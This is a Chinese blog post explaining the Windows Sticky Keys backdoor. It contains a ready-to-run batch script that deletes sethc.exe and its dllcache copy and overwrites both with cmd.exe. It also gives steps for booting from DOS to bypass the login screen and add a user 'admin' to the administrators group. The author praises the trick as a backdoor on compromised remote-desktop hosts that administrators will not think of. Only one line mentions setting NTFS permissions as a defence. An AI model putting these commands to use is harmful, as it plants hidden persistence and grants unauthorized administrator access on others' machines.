`
icarusli
  • 浏览: 531024 次
  • 性别: Icon_minigender_1
  • 来自: 广州
社区版块
存档分类
最新评论

粘滞键漏洞

阅读更多

粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe

Windows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。即使
在3389中,都可以弹出!!
它本来是为不方便按组合键的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以用cmd命令了.
其实写的批处理就可以解决了 又不麻烦

@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
我把它保存为5shift.bat。当我们运行它的时候,sethc.exe 就被换成了改了名的cmd.exe了。
可能由于cmd也是系统文件,所以替换是并没有弹出文件保护。呵呵。

个人感觉这个后门非常实用(特别是3389肉鸡!)。哪个管理员会考虑到这种后门呢

然后你就可以创建用户了
net user [UserName [Password | *] [options] [/domain]
net user [UserName {Password | *} /add [options] [/domain]
net user [UserName [/delete] [/domain]

[color=Red][b]把sethc.exe文件的NTFS权限设置一下就安全了.[/b][/color]

用shift键破解windows的登录密码.

首先用DOS盘启动.然后转到c:\windows\system32\下面.输入如下命令:

copy sethc.exe sethc2.exe 备份粘滞键文件

copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe

然后重启.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入如下密码:

net user admin admin /add 添加admin用户,密码是admin

net localgroup administrators admin /add 提升为超级管理员
分享到:
评论

相关推荐

    粘滞键后门-自动创建-批处理版(axun)

    然而,安全漏洞往往潜藏于意想不到的地方,粘滞键也不例外。攻击者可以通过编写特定的批处理脚本(如压缩包中的"粘滞键后门.bat"),利用粘滞键功能来创建一个不易被察觉的后门。这种后门可能允许远程访问、执行任意...

    将粘滞键替换为cmd.exe

    粘滞键(Sticky Keys)是Windows操作系统中的一项辅助功能,设计用于帮助用户在按下Shift键五次后连续输入多个Shift键。这个功能对于那些有物理障碍或使用困难的用户非常有用,但有时可能被误触发或者不适用于某些...

    一个delphi和C写的粘滞键后门

    标题 "一个delphi和C写的粘滞键后门" 提示了这个压缩包包含的是一个用 Delphi 和 C 语言编写的恶意软件样本,具体来说是一个利用“粘滞键”功能的后门程序。粘滞键是 Windows 操作系统中的一个辅助功能,允许用户在...

    粘滞键一键屏蔽助手 v2.1.zip

    粘滞键一键屏蔽助手您的游戏专业守护神。按下3次Shift老是弹出粘滞键怎么办?赶紧用粘滞键一键屏蔽助手,精灵小巧,迷你小界面,安全可靠,一键操作,只需一步,绝不繁琐,一键帮你解除烦恼。 粘滞键一键屏蔽助手 v...

    360屏蔽windows键和系统粘滞键.docx

    "360屏蔽Windows键和系统粘滞键" 一、概述 在Windows操作系统中,Windows键和系统粘滞键是两个常用的热键。然而,在某些情况下,这两个键可能会干扰到游戏或其他应用程序的正常运行。为了解决这个问题,360安全卫士...

    win10原版粘滞键文件

    win10原版粘滞键文件

    怎么样把cmd程序替换sethc程序

    当用户连续按下Shift键五次时,默认情况下会启动粘滞键功能。 - **EXPLORER.EXE**:这是Windows资源管理器的核心进程,负责处理图形用户界面(GUI)中的许多任务,如文件管理、桌面图标显示等。 - **CMD.EXE**:...

    调用者:渗透测试实用程序

    9. **粘滞键漏洞**:粘滞键漏洞(Sticky Keys)是一种旧的利用方式,通过发送特定序列的按键可以绕过用户交互,达到远程执行代码的目的。 10. **访问令牌操纵**:攻击者可能会篡改或复制访问令牌,以获得更高的权限...

    可自删除 开启3389创建用户粘滞键后门的vbs

    ### 可自删除开启3389创建用户粘滞键后门的VBS脚本解析 #### 一、概述 本文将对一个特定的VBS(Visual Basic Script)脚本进行详细分析,该脚本的功能是开启3389端口,并通过创建用户和设置粘滞键后门来实现远程...

    新建粘滞模型.zip

    在给定的“新建粘滞模型.zip”压缩包文件中,包含了两个主要的文件:Chen_vsm1.m 和 Chen_s_vsm.slxc。这些文件是用于模拟阀门粘滞特性的数学模型,可以帮助用户理解并分析阀门在实际操作中的动态性能。 首先,Chen...

    键盘上的每个作用包括特殊键

    标题中的"键盘上的每个作用包括特殊键"是指键盘上的各个按键以及它们的特殊功能,而描述则提到了一些辅助功能键的组合使用方法,这些组合键主要用于调整电脑的辅助功能,如筛选键、粘滞键、切换键、鼠标键和高对比度...

    Linux下的粘滞位详细介绍

    在Linux操作系统中,粘滞位(Sticky Bit)是一个特殊权限位,主要用于控制对特定目录的文件删除操作,尤其在多用户环境中,确保用户只能删除自己创建的文件,而不能随意删除他人文件。这个功能最初是为了保护 `/tmp`...

    “痰性粘滞”理论的实验探讨

    从提供的文件内容来看,知识点主要集中在中医学领域中对痰性粘滞理论的实验研究。具体可以从以下几个方面来深入探讨: 1. 痰性粘滞理论:痰性粘滞是指在中医理论中,痰邪致病的一个特点,痰邪往往粘滞难解,容易...

    从程序里直接得到水的粘滞系数和动力粘滞系数,省的自己每次都查书

    现在书上关于水的粘滞系数和动力粘滞系数的表格、单位弄的很混乱。查了几本书,终于整理出来了合理的系数关系。用程序记下来。

    nginx+redis负载均衡和session粘滞

    本教程将探讨如何在Windows环境中,利用Nginx作为反向代理服务器,Redis作为session存储,与Tomcat应用服务器配合,实现负载均衡和session粘滞。 **负载均衡** 负载均衡是一种技术,用于分散网络流量到多个服务器...

    无轴粘滞阻尼器的性能试验与有限元分析

    无轴粘滞阻尼器是一种新型的工程减震设备,其设计思路和工作原理与传统活塞式粘滞阻尼器有着明显的区别。无轴粘滞阻尼器的核心特点在于取消了传统的活塞轴设计,转而利用油腔自身的变形来驱动粘滞流体通过阻尼孔,...

    落球法测量液体粘滞系数实验的Matlab研究.pdf

    落球法是一种常见的实验方法,用于测量液体的粘滞系数。粘滞系数是表征流体粘性大小的重要物理量,它与流体内部摩擦力的产生有关,这个摩擦力就是粘滞力,其方向与流体的运动方向平行,大小与速度梯度和接触面积成...

Global site tag (gtag.js) - Google Analytics